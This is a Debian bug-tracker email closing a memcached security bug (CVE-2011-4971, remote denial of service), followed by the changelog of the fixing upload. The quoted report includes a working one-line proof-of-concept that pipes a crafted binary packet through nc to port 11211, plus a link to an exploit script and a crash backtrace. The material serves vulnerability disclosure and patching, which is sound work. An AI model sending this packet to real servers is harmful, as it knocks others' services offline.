Your message dated Fri, 03 Jan 2014 15:22:20 +0000
with message-id <[email protected]>
and subject line Bug#706426: fixed in memcached 1.4.13-0.3
has caused the Debian Bug report #706426,
regarding memcached: CVE-2011-4971: remote denial of service
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)
--
706426: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=706426
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: memcached
Version: 1.4.5-1
Severity: important
Tags: security
memcached service crashes when sending specially crafted packet as reported in
here https://code.google.com/p/memcached/issues/detail?id=i192 Mar 15, 2011.
Upstream has not fixed this yet.
PoC:
1) echo -en
'\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
| nc localhost 11211
2) http://insecurety.net/wordpress/wp-content/uploads/2013/04/killthebox.py_.txt
Backtrace from squeeze libmemcached5 0.40-1 memcached 1.4.5-1 below:
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7ffff69f0700 (LWP 16957)]
0x00007ffff76c7482 in _wordcopy_bwd_dest_aligned (dstp=140737352400864,
srcp=6501120, len=2305843009213693940)
at wordcopy.c:392
392 wordcopy.c: No such file or directory.
in wordcopy.c
(gdb) bt
#0 0x00007ffff76c7482 in _wordcopy_bwd_dest_aligned (dstp=140737352400864,
srcp=6501120, len=2305843009213693940)
at wordcopy.c:392
#1 0x00007ffff76c568a in *__GI_memmove (dest=0x7ffff7e58053, src=<value
optimized out>, len=18446744073709551581)
at memmove.c:99
#2 0x000000000040a105 in ?? ()
#3 0x00007ffff7bcc344 in event_base_loop () from /usr/lib/libevent-1.4.so.2
#4 0x000000000040d7c4 in ?? ()
#5 0x00007ffff79af8ca in start_thread (arg=<value optimized out>) at
pthread_create.c:300
#6 0x00007ffff7716b6d in clone () at
../sysdeps/unix/sysv/linux/x86_64/clone.S:112
#7 0x0000000000000000 in ?? ()
Please contact me in case you need help solving this issue.
---
Henri Salo
signature.asc
Description: Digital signature
--- End Message ---
--- Begin Message ---
Source: memcached
Source-Version: 1.4.13-0.3
We believe that the bug you reported is fixed in the latest version of
memcached, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Salvatore Bonaccorso <[email protected]> (supplier of updated memcached package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Format: 1.8
Date: Mon, 30 Dec 2013 17:47:44 +0100
Source: memcached
Binary: memcached
Architecture: source amd64
Version: 1.4.13-0.3
Distribution: unstable
Urgency: high
Maintainer: David MartÃnez Moreno <[email protected]>
Changed-By: Salvatore Bonaccorso <[email protected]>
Description:
memcached - A high-performance memory object caching system
Closes: 706426 733643
Changes:
memcached (1.4.13-0.3) unstable; urgency=high
.
* Non-maintainer upload.
* Add 06_CVE-2011-4971.patch patch.
CVE-2011-4971: Fix remote denial of service. Sending a specially
crafted packet cause memcached to segfault. (Closes: #706426)
* Add 07_CVE-2013-7239.patch patch.
CVE-2013-7239: SASL authentication allows wrong credentials to access
memcache. (Closes: #733643)
Checksums-Sha1:
1a470c770a3766e7abe35cbc4fda1184439f4a82 1778 memcached_1.4.13-0.3.dsc
d9a48d222de53a2603fbab6156d48d0e8936ee92 320751 memcached_1.4.13.orig.tar.gz
e810be36f9f75c5cf477d726ddfe8ad87eacf183 13906 memcached_1.4.13-0.3.diff.gz
bdbc24572e201711871992c5d8783faf0b669e7d 77622 memcached_1.4.13-0.3_amd64.deb
Checksums-Sha256:
87c81faccf611b7e39e7464ed217ed1e6a3ce36631ede820b63b765a549ad2c3 1778
memcached_1.4.13-0.3.dsc
cb0b8b87aa57890d2327906a11f2f1b61b8d870c0885b54c61ca46f954f27e29 320751
memcached_1.4.13.orig.tar.gz
45760a8dfffc672aad948aace33b87c2ebe7a2934d5f0d096458be99ac62c970 13906
memcached_1.4.13-0.3.diff.gz
dc82c7c203677a2009dcbab978a42fee9c0548f3a3f36a08d5c8465c3c96fbde 77622
memcached_1.4.13-0.3_amd64.deb
Files:
a8e1422ac7dc84748fd216f348314a72 1778 web optional memcached_1.4.13-0.3.dsc
6d18c6d25da945442fcc1187b3b63b7f 320751 web optional
memcached_1.4.13.orig.tar.gz
6c1f14b699cc5e962781b61da3773067 13906 web optional
memcached_1.4.13-0.3.diff.gz
6bcc195d2eff12e2c3f82cfdd6c01c71 77622 web optional
memcached_1.4.13-0.3_amd64.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.15 (GNU/Linux)
iQIcBAEBCgAGBQJSxCeyAAoJEAVMuPMTQ89E1RwP/1xAt2C9bBWCtIo2wS/Vkt3g
c67K3yVS+oFiAUj068Z0/rWfvnZcfAR8mG9Mu8eBD5AMrJES9XLBU1ZWOHKTmaqr
CLFVOhbn8AS5CadkJ5VpCV56ISbXrVlsxRgmfzKhIObOseNFC/Alt2c7GC7fM7Bj
57mcEof41LHNso19g3by/WV4vI33CGCZ2NGobF+VzBw0lKu3mVDbayEQ2HR2MAnw
8P3yVqkmMJ43UNqn6dBAru/IVsb3zfW/GNF1XS8bGwzTRVSj4/nzYHvyUuLjL0A6
Db2Bc5SBwPbQIX3CalAKCCX85DwgvV1LQZDuD+cbwWLSlHH+wWPTqhPU+y2Q26BO
Pjf1kJ/+ZIls5Pt2zX4d2Y5ufgoAxbdCQjuhDt91LQYMLM4Oy3YMId7GkCzEgxTi
lfHeF2/walrig2U4DrJwQmvoASM6ng9PZH4G9aI5lS7ZuSJ4DL3972WVauDg326k
CYYGY8W0t+54qLYvtjH4Dh3vV4rKXYEFQglqOvbxjCWisLKtWNHQPPTjUevLCNcS
NigGKJCM45KlZ4bndkNJk6UXQDX5hYcFhEYvChgxN1eE6bYWUIgw2HBMz+3p1ETD
pYxw6c/MpHF40L6hdUfK6ERyJnCa91XhyyBZtIrrWjSncG4q+KTJujNo5pLxAd2z
X8ie2PQA25PCsPpnonuY
=hiUH
-----END PGP SIGNATURE-----
--- End Message ---
